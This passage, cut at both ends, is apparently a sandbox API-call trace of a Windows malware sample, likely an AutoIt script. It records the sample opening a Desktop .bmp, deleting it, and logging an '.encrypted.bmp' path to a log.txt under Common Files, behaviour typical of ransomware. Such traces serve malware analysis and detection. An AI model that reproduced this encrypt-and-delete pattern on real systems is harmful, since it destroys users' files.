lpsz="byte[84012]", cchLength=0xb | out: lpsz="byte[84012]") returned 0xb [0032.342] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.342] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0032.342] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0032.342] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0032.342] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.342] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0032.342] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0032.342] FreeLibrary (hLibModule=0x76b40000) returned 1 [0032.342] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0032.342] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0032.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0032.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0032.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0032.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0032.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0032.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0032.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0032.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0032.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0032.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0032.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0032.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0032.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0032.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0032.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0032.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0032.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0032.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0032.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0032.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0032.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0032.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0032.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0032.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0032.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0032.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0032.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.343] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.343] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.343] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.343] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0032.343] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.343] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.343] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.344] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.344] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.344] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.344] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.344] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.344] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.344] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.344] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.344] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.344] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.344] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.344] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.344] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.344] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0032.344] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.344] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xhMPO 5df6plfz4yAr.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xhmpo 5df6plfz4yar.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0032.345] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.345] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.345] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.345] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.345] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0032.345] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.345] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.345] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.345] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.345] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.345] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.345] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.345] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.346] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0032.346] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.346] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.346] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.346] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.346] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.346] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.346] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.346] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xhMPO 5df6plfz4yAr.bmp", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xhMPO 5df6plfz4yAr.bmp", lpFilePart=0x0) returned 0x3c [0032.346] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xhMPO 5df6plfz4yAr.bmp", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99aa2630, ftCreationTime.dwHighDateTime=0x1d5b6d2, ftLastAccessTime.dwLowDateTime=0x3c201e00, ftLastAccessTime.dwHighDateTime=0x1d5c5e8, ftLastWriteTime.dwLowDateTime=0x132b2260, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x1482c, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="xhMPO 5df6plfz4yAr.bmp", cAlternateFileName="XHMPO5~1.BMP")) returned 0x7c2240 [0032.346] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xhMPO 5df6plfz4yAr.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xhmpo 5df6plfz4yar.bmp")) returned 1 [0032.348] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99aa2630, ftCreationTime.dwHighDateTime=0x1d5b6d2, ftLastAccessTime.dwLowDateTime=0x3c201e00, ftLastAccessTime.dwHighDateTime=0x1d5c5e8, ftLastWriteTime.dwLowDateTime=0x132b2260, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x1482c, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="xhMPO 5df6plfz4yAr.bmp", cAlternateFileName="XHMPO5~1.BMP")) returned 0 [0032.348] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0032.348] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.348] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0032.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0032.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0032.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0032.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0032.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0032.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0032.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0032.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0032.348] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0032.349] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0032.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0032.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0032.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0032.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0032.349] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0032.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0032.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0032.349] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0032.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0032.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0032.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0032.349] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0032.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0032.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0032.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0032.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0032.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0032.349] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0032.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0032.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0032.349] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0032.349] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0032.350] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0032.350] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0032.350] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0032.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0032.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0032.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0032.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0032.350] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0032.350] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0xbf2, lpOverlapped=0x0) returned 1 [0032.350] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0032.350] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0xbf2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0032.350] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0032.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0032.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0032.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0032.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0032.350] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xhMPO 5df6plfz4yAr.encrypted.bmp\r\n", cchWideChar=73, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 73 [0032.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x49) returned 0x7f36e0 [0032.350] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xhMPO 5df6plfz4yAr.encrypted.bmp\r\n", cchWideChar=73, lpMultiByteStr=0x7f36e0, cbMultiByte=73, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xhMPO 5df6plfz4yAr.encrypted.bmp\r\n", lpUsedDefaultChar=0x0) returned 73 [0032.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0032.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0032.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0032.350] WriteFile (in: hFile=0x128, lpBuffer=0x7f3688*, nNumberOfBytesToWrite=0x48, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f3688*, lpNumberOfBytesWritten=0x6aee3c*=0x48, lpOverlapped=0x0) returned 1 [0032.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0032.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0032.351] CloseHandle (hObject=0x128) returned 1 [0032.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0032.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0032.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0032.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0032.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0032.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0032.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0032.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0032.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0032.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0032.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0032.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0032.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0032.352] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0032.352] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0032.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0032.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0032.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0032.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0032.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0032.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0032.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0032.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0032.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0032.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0032.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0032.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0032.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0032.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0032.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0032.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0032.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0032.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0032.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0032.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0032.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 